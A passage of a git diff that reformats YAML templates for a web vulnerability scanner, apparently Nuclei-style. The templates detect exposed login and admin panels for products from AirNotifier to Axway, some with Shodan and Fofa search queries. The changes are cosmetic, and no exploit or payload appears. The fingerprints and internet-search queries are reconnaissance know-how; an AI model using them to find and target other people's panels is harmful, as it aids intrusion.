max-request: 1 shodan-query: http.title:"AirNotifier" tags: panel,airnotifier diff --git a/http/exposed-panels/akamai-cloudtest.yaml b/http/exposed-panels/akamai-cloudtest.yaml index cbf3f75afd..792beb9dd3 100644 --- a/http/exposed-panels/akamai-cloudtest.yaml +++ b/http/exposed-panels/akamai-cloudtest.yaml @@ -9,9 +9,9 @@ info: - https://techdocs.akamai.com/cloudtest/docs classification: cwe-id: CWE-200 - tags: panel,akamai metadata: max-request: 1 + tags: panel,akamai http: - method: GET diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 9416f511ac..27508fc293 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -9,9 +9,9 @@ info: - https://www.alfresco.com/ classification: cwe-id: CWE-200 - tags: alfresco,tech,panel metadata: max-request: 1 + tags: alfresco,tech,panel http: - method: GET diff --git a/http/exposed-panels/alienvault-usm.yaml b/http/exposed-panels/alienvault-usm.yaml index d5123efbe5..26eba0f8de 100644 --- a/http/exposed-panels/alienvault-usm.yaml +++ b/http/exposed-panels/alienvault-usm.yaml @@ -22,6 +22,7 @@ http: - type: word words: - 'AlienVault USM' + - type: status status: - 200 diff --git a/http/exposed-panels/allied-telesis-exposure.yaml b/http/exposed-panels/allied-telesis-exposure.yaml index 176772e45b..99ce79726a 100644 --- a/http/exposed-panels/allied-telesis-exposure.yaml +++ b/http/exposed-panels/allied-telesis-exposure.yaml @@ -9,11 +9,11 @@ info: - https://www.alliedtelesis.com/in/en classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Allied Telesis Device GUI" tags: panel,allied diff --git a/http/exposed-panels/ambari-exposure.yaml b/http/exposed-panels/ambari-exposure.yaml index 1fa692b5f9..b3209fd9f4 100644 --- a/http/exposed-panels/ambari-exposure.yaml +++ b/http/exposed-panels/ambari-exposure.yaml @@ -7,11 +7,11 @@ info: description: An Apache Ambari panel was discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 - tags: panel,apache,ambari,exposure metadata: max-request: 1 + tags: panel,apache,ambari,exposure http: - method: GET diff --git a/http/exposed-panels/ametys-admin-login.yaml b/http/exposed-panels/ametys-admin-login.yaml index 027a0df123..bbabbd9e52 100644 --- a/http/exposed-panels/ametys-admin-login.yaml +++ b/http/exposed-panels/ametys-admin-login.yaml @@ -7,9 +7,9 @@ info: description: An Ametys admin login panel was discovered. classification: cwe-id: CWE-200 - tags: panel,ametys,cms metadata: max-request: 1 + tags: panel,ametys,cms http: - method: GET diff --git a/http/exposed-panels/amp-application-panel.yaml b/http/exposed-panels/amp-application-panel.yaml index 19b3f93c92..79d0abf72c 100644 --- a/http/exposed-panels/amp-application-panel.yaml +++ b/http/exposed-panels/amp-application-panel.yaml @@ -7,11 +7,11 @@ info: description: Application Management Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"AMP - Application Management Panel" tags: panel,amp @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "<title>AMP - Application Management Panel" diff --git a/http/exposed-panels/ampache-panel.yaml b/http/exposed-panels/ampache-panel.yaml index cba61d89e9..fc3d08a78e 100644 --- a/http/exposed-panels/ampache-panel.yaml +++ b/http/exposed-panels/ampache-panel.yaml @@ -7,11 +7,11 @@ info: description: Ampache login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.title:"For the Love of Music" tags: panel,ampache @@ -25,6 +25,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ampps-admin-panel.yaml b/http/exposed-panels/ampps-admin-panel.yaml index 99c68f449d..2e2e3182ac 100644 --- a/http/exposed-panels/ampps-admin-panel.yaml +++ b/http/exposed-panels/ampps-admin-panel.yaml @@ -7,9 +7,9 @@ info: description: An AMPPS Admin login panel was detected. classification: cwe-id: CWE-200 - tags: panel,ampps,login metadata: max-request: 1 + tags: panel,ampps,login http: - method: GET @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ampps-panel.yaml b/http/exposed-panels/ampps-panel.yaml index 4475cf034b..68d76d9cf9 100644 --- a/http/exposed-panels/ampps-panel.yaml +++ b/http/exposed-panels/ampps-panel.yaml @@ -7,9 +7,9 @@ info: description: An AMPPS login panel was detected. classification: cwe-id: CWE-200 - tags: panel,ampps,login metadata: max-request: 1 + tags: panel,ampps,login http: - method: GET @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/anaqua-login-panel.yaml b/http/exposed-panels/anaqua-login-panel.yaml index 6933988d53..14296b8dd0 100644 --- a/http/exposed-panels/anaqua-login-panel.yaml +++ b/http/exposed-panels/anaqua-login-panel.yaml @@ -8,11 +8,11 @@ info: Checks for the presence of Anaqua login page classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Anaqua User Sign On"" tags: anaqua,login,panel @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/ansible-tower-exposure.yaml b/http/exposed-panels/ansible-tower-exposure.yaml index 4fccb30c58..41c8dbf1dc 100644 --- a/http/exposed-panels/ansible-tower-exposure.yaml +++ b/http/exposed-panels/ansible-tower-exposure.yaml @@ -10,12 +10,12 @@ info: - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 - google-query: intitle:"Ansible Tower" shodan-query: title:"Ansible Tower" + google-query: intitle:"Ansible Tower" tags: panel,ansible http: diff --git a/http/exposed-panels/apache-jmeter-dashboard.yaml b/http/exposed-panels/apache-jmeter-dashboard.yaml index ccc97f3c07..7a4e65062e 100644 --- a/http/exposed-panels/apache-jmeter-dashboard.yaml +++ b/http/exposed-panels/apache-jmeter-dashboard.yaml @@ -7,11 +7,11 @@ info: description: Apache JMeter Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache JMeter Dashboard" tags: apache,jmeter,panel diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index f64491f078..dba2952f1d 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -7,11 +7,11 @@ info: description: Apache Mesos panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Mesos" fofa-query: app="APACHE-MESOS" tags: panel,apache,mesos @@ -23,6 +23,7 @@ http: - "{{BaseURL}}:5050" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index fc1300e2ac..8237cff178 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -7,7 +7,7 @@ info: description: Apache Tomcat Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 diff --git a/http/exposed-panels/apiman-panel.yaml b/http/exposed-panels/apiman-panel.yaml index c9b688b5dc..3012893d58 100644 --- a/http/exposed-panels/apiman-panel.yaml +++ b/http/exposed-panels/apiman-panel.yaml @@ -9,9 +9,9 @@ info: - https://www.apiman.io/latest/ classification: cwe-id: CWE-200 - tags: panel,apiman metadata: max-request: 1 + tags: panel,apiman http: - method: GET diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index 1ad6f575e0..87e3395f60 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -9,11 +9,11 @@ info: - https://www.appsmith.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"appsmith" tags: panel,appsmith diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index 1e1952e151..f664d80b64 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.appspace.com/ metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: title:"Appspace" tags: appspace,panel,detect @@ -23,6 +23,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index abc0c8a5bc..b313484cd4 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -7,11 +7,11 @@ info: description: Appwrite login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:-633108100 tags: panel,appwrite,detect diff --git a/http/exposed-panels/aptus-panel.yaml b/http/exposed-panels/aptus-panel.yaml index ea60187c8c..adf972dfd5 100644 --- a/http/exposed-panels/aptus-panel.yaml +++ b/http/exposed-panels/aptus-panel.yaml @@ -7,7 +7,7 @@ info: description: Aptus login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index e285efe660..1eb5b2363d 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.aquasec.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" google-query: intitle:"Aqua Cloud Native Security Platform" tags: panel,aqua,aquasec diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index f72c36efb4..9155f79699 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.arangodb.com/docs/stable/ metadata: + verified: "true" max-request: 1 shodan-query: http.title:"ArangoDB Web Interface" - verified: "true" tags: panel,arangodb,login http: diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index 26cf8d088d..354a797abc 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -9,9 +9,9 @@ info: - https://enterprise.arcgis.com/en/ classification: cwe-id: CWE-200 - tags: docs,arcgis,cms,panel metadata: max-request: 1 + tags: docs,arcgis,cms,panel http: - method: GET diff --git a/http/exposed-panels/arcgis/arcgis-rest-api.yaml b/http/exposed-panels/arcgis/arcgis-rest-api.yaml index 8ecac25866..b0d6090c46 100644 --- a/http/exposed-panels/arcgis/arcgis-rest-api.yaml +++ b/http/exposed-panels/arcgis/arcgis-rest-api.yaml @@ -9,9 +9,9 @@ info: - https://enterprise.arcgis.com/en/ classification: cwe-id: CWE-200 - tags: api,arcgis,cms,panel metadata: max-request: 1 + tags: api,arcgis,cms,panel http: - method: GET diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index 30bc4d5ed0..10b051a2d0 100644 --- a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -1,38 +1,38 @@ -id: arcgis-api-service - -info: - name: ArcGIS REST Services Directory - Detect - author: HeeresS - severity: info - description: Check for the existence of the "/arcgis/rest/services" path on an ArcGIS server. - reference: - - https://enterprise.arcgis.com/en/ - metadata: - max-request: 1 - verified: true - shodan-query: title:"ArcGIS" - tags: panel,arcgis,rest,api,detect - -http: - - method: GET - path: - - '{{BaseURL}}/arcgis/rest/services' - - matchers-condition: and - matchers: - - type: word - words: - - 'REST Services Directory' - - 'ArcGIS' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Current Version:\s*<\/b>\s*([0-9.]+)' +id: arcgis-api-service + +info: + name: ArcGIS REST Services Directory - Detect + author: HeeresS + severity: info + description: Check for the existence of the "/arcgis/rest/services" path on an ArcGIS server. + reference: + - https://enterprise.arcgis.com/en/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"ArcGIS" + tags: panel,arcgis,rest,api,detect + +http: + - method: GET + path: + - '{{BaseURL}}/arcgis/rest/services' + + matchers-condition: and + matchers: + - type: word + words: + - 'REST Services Directory' + - 'ArcGIS' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Current Version:\s*<\/b>\s*([0-9.]+)' diff --git a/http/exposed-panels/arcgis/arcgis-tokens.yaml b/http/exposed-panels/arcgis/arcgis-tokens.yaml index bee4c3a7b6..442ab834f9 100644 --- a/http/exposed-panels/arcgis/arcgis-tokens.yaml +++ b/http/exposed-panels/arcgis/arcgis-tokens.yaml @@ -1,30 +1,30 @@ -id: arcgis-token-service - -info: - name: ArcGIS Token Service - Detect - author: HeeresS - severity: info - description: Check for the existence of the ArcGIS Token Service on an ArcGIS server. - reference: - - https://enterprise.arcgis.com/en/ - metadata: - max-request: 1 - verified: true - shodan-query: title:"ArcGIS" - tags: panel,arcgis,tokens,detect - -http: - - method: GET - path: - - '{{BaseURL}}/arcgis/tokens/' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'alt="ArcGIS Token Service' - - - type: status - status: - - 200 +id: arcgis-token-service + +info: + name: ArcGIS Token Service - Detect + author: HeeresS + severity: info + description: Check for the existence of the ArcGIS Token Service on an ArcGIS server. + reference: + - https://enterprise.arcgis.com/en/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"ArcGIS" + tags: panel,arcgis,tokens,detect + +http: + - method: GET + path: + - '{{BaseURL}}/arcgis/tokens/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'alt="ArcGIS Token Service' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index b475a4ba1e..fa5b5edf2e 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -9,11 +9,11 @@ info: - https://archibus.com/products/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.favicon.hash:889652940 tags: panel,archibus @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index a9f8a0ee08..10a95a26d9 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/HunterMapping/status/1674267368359444480 - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1889244460 fofa-query: icon_hash="-1889244460" tags: panel,login,arcserve,detect diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index b07def378b..7a72e47e61 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -7,11 +7,11 @@ info: description: ARRIS Touchstone Telephony Modem status panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"phy.htm" tags: panel,arris diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index fc4eca2525..fae481b93f 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - fofa-query: app="ASPCMS" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="ASPCMS" tags: panel,login,aspcms,admin http: @@ -19,7 +19,6 @@ http: - | GET /plug/oem/AspCms_OEMFun.asp HTTP/1.1 Host: {{Hostname}} - - | GET {{path}} HTTP/1.1 Host: {{Hostname}} @@ -31,7 +30,6 @@ http: group: 1 regex: - "top.location.href='(.*?)'" - matchers: - type: dsl dsl: diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 764084923d..a5b7d7b274 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -8,11 +8,11 @@ info: ASPECT Control Panel login was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1011076161 tags: panel,aspect,login diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index 711e32828d..9ad02c0dec 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: title:"AiCloud" tags: panel,asus,aicloud,detect diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index ee8d2c7b6a..e2904bad2b 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -7,11 +7,11 @@ info: description: Asus router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' tags: panel,asus,router,iot diff --git a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index 0c554482f8..eb77a88aa2 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -9,11 +9,11 @@ info: - https://github.com/runatlantis/atlantis classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1706783005 tags: panel,atlantis diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 10eeb1b28d..5ae879dd59 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -9,12 +9,12 @@ info: - https://www.atlassian.com/ classification: cwe-id: CWE-200 - tags: panel,atlassian metadata: max-request: 1 vendor: atlassian product: crowd category: sso + tags: panel,atlassian http: - method: GET diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 3e91fb63ef..4e02fc484e 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Audiobookshelf" tags: panel,audiobookshelf,detect @@ -21,6 +21,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index bb7254d349..364eea6163 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -7,11 +7,11 @@ info: description: AudioCodes login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Audiocodes" tags: panel,audiocodes @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index 7afb5365c2..e92cc40f77 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -9,7 +9,7 @@ info: - http://www.avantfax.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 metadata: max-request: 1 diff --git a/http/exposed-panels/avatier-password-management.yaml b/http/exposed-panels/avatier-password-management.yaml index faaadef1f0..808f8ad473 100644 --- a/http/exposed-panels/avatier-password-management.yaml +++ b/http/exposed-panels/avatier-password-management.yaml @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index 7cc886fb23..f406c65ffa 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -7,11 +7,11 @@ info: description: Avaya Aura Communication Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,avaya metadata: max-request: 1 + tags: panel,avaya http: - method: GET diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index 5719248ac5..e076ee92b9 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -7,11 +7,11 @@ info: description: Avaya Aura System Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,avaya metadata: max-request: 1 + tags: panel,avaya http: - method: GET diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index 6e2b8de1ac..610742da54 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -7,11 +7,11 @@ info: description: Avigilon login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Login - Avigilon Control Center" tags: panel,avigilon diff --git a/http/exposed-panels/avtech-avn801-camera-panel.yaml b/http/exposed-panels/avtech-avn801-camera-panel.yaml index c01c7f3b29..98c4e39d75 100644 --- a/http/exposed-panels/avtech-avn801-camera-panel.yaml +++ b/http/exposed-panels/avtech-avn801-camera-panel.yaml @@ -5,12 +5,12 @@ info: author: idealphase severity: info description: An Avtech AVN801 Network Camera administration panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - http://www.avtech.com.tw + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: title:"login" product:"Avtech AVN801 network camera" diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 35d252e775..0d54ea3ddd 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,9 +7,9 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,exposure,avtech,panel metadata: max-request: 1 + tags: dvr,exposure,avtech,panel http: - method: GET @@ -21,6 +21,7 @@ http: - type: status status: - 200 + - type: word words: - "Firmware.Version=" diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index bfe0d7b918..b57e0697e8 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" tags: exposure,ec2,aws,amazon,panel @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index fa6b82d545..d19c27f49b 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -9,11 +9,11 @@ info: - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,opensearch,aws metadata: max-request: 1 + tags: panel,opensearch,aws http: - method: GET diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 0b5bd335d7..487e7afc6e 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -7,11 +7,11 @@ info: description: Axel WebServer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Axel" fofa-query: app="AxelWebServer" tags: panel,axel,webserver diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index b827034a1d..29ae652c54 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -5,8 +5,8 @@ info: author: johnk3r severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Axway API Manager Login" tags: panel,axway,detect diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index 3896c2f2e6..e8a0162832 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.axway.com/en/products/managed-file-transfer/securetransport classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - 